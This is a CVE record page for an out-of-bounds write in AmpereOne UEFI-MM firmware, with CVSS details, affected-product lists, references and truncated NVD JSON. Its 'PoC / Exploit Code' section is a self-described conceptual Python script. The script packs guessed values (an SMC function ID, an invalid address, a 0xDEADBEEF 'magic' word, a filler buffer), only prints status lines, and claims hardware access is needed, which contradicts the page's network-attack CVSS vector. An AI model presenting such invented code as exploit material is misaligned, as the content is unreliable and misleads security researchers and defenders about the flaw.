CVE-2025-62864

Description

Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM MMCommunicate service that could result in an out-of-bounds write within the UEFI-MM Secure Partition context.

CVSS Details

CVSS Score

9.8

Severity

CRITICAL

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:* - NOT VULNERABLE

Ampere AmpereOne AC03 < 3.5.9.3

Ampere AmpereOne AC04 < 4.4.5.2

Ampere AmpereOne M < 5.4.5.1

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-62864 PoC - Conceptual Proof of Concept
# Note: This is a conceptual demonstration for research purposes only
# Actual exploitation requires specific hardware access and firmware analysis

import struct

def construct_malicious_smc_call():
    """
    Construct a malformed SMC call to trigger OOB write in UEFI-MM
    This is a simplified conceptual representation
    """
    # SMC Function ID for MMCommunicate
    SMC_FUNC_ID = 0xC000EE01
    
    # Crafted buffer with oversized data
    # The MMCommunicate handler should validate buffer size
    # but vulnerable versions lack proper boundary checks
    oversized_buffer = b'A' * 1024  # Exceed expected buffer size
    
    # Construct SMC arguments
    smc_args = {
        'func_id': SMC_FUNC_ID,
        'buffer_address': 0xFFFFFFFF,  # Invalid/misleading address
        'buffer_size': len(oversized_buffer),
        'magic_value': 0xDEADBEEF  # May trigger specific code path
    }
    
    # Serialize for transmission
    payload = struct.pack('<QQQQ',
        smc_args['func_id'],
        smc_args['buffer_address'],
        smc_args['buffer_size'],
        smc_args['magic_value']
    )
    payload += oversized_buffer
    
    return payload

def send_smc_call(payload):
    """
    Send malformed SMC call to trigger vulnerability
    Requires specific hardware interface (JTAG, debug port, or firmware update)
    """
    print(f"[*] Constructed malicious payload: {len(payload)} bytes")
    print(f"[*] SMC Function ID: 0xC000EE01")
    print(f"[*] Buffer size: 1024 bytes (exceeds safe limit)")
    print("[!] Note: Actual exploitation requires privileged access to device")
    # In real scenario, this would interface with ARM SMC dispatcher
    # or through firmware update mechanism
    
if __name__ == "__main__":
    poc = construct_malicious_smc_call()
    send_smc_call(poc)
    print("[*] PoC generated - requires hardware-level access for testing")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-62864
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-62864
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-62864/
[4] VulDB https://vuldb.com/cve/CVE-2025-62864
[5] https://amperecomputing.com/products/product-security
[6] https://amperecomputing.com/products/security-bulletins/amp-sb-0007

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-62864", "sourceIdentifier": "[email protected]", "published": "2025-12-16T18:16:13.607", "lastModified": "2026-01-13T20:58:05.087", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Ampere AmpereOne AC03 devices before 3.5.9.3, AmpereOne AC04 devices before 4.4.5.2, and AmpereOne M devices before 5.4.5.1 allow an incorrectly formed SMC call to UEFI-MM MMCommunicate service that could result in an out-of-bounds write within the UEFI-MM Secure Partition context."}], "metrics": {"cvssMetricV31": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-787"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a192-32m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "A9523999-81AB-47DD-B8D5-A352FE3B1D5B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a192-32m:-:*:*:*:*:*:*:*", "matchCriteriaId": "2384E36F-8268-404E-80D6-C98E3EA1C299"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a192-26m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "A13FFFC6-7355-4F15-B1AC-A1F8D71A4AD1"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a192-26m:-:*:*:*:*:*:*:*", "matchCriteriaId": "F9EBCAD2-E1D0-40FC-8791-AD0F50EEBE50"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a160-28m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "54A0E3ED-F092-448D-8ACE-A0A16C4B451E"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a160-28m:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E5723F8-301B-49B1-8968-1337689146DE"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a144-33m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "6996EFF6-6CF0-44B9-997F-A3C721D0CDA2"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a144-33m:-:*:*:*:*:*:*:*", "matchCriteriaId": "45C2645C-B01C-4070-A1D0-32D614028AD3"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a144-26m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "90C08FC4-2D5F-4E67-88AB-A82A1C0D60EC"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a144-26m:-:*:*:*:*:*:*:*", "matchCriteriaId": "A1766FF3-1D99-4FED-AC42-E0954FCCBF0C"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a96-36m_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "5.4.5.1", "matchCriteriaId": "753CE183-4807-4C99-8BD4-43B57C5A44D6"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a96-36m:-:*:*:*:*:*:*:*", "matchCriteriaId": "1E84F28F-985D-4A5F-9A4E-49B7A39F913E"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a96-36x_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.5.2", "matchCriteriaId": "851C8C9F-5FFB-451D-95CC-75A8CDAEC59B"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:h:amperecomputing:ampereone_a96-36x:-:*:*:*:*:*:*:*", "matchCriteriaId": "2A293338-7B91-4536-BE77-7A1FE411DFBC"}]}]}, {"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:amperecomputing:ampereone_a128-34x_firmware:*:*:*:*:*:*:*:*", "versionEndExcluding": "4.4.5.2", "matchCriteriaId": "D2A240BF-86B5-4681-9347-E871369AE3AA"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "crite ... (truncated)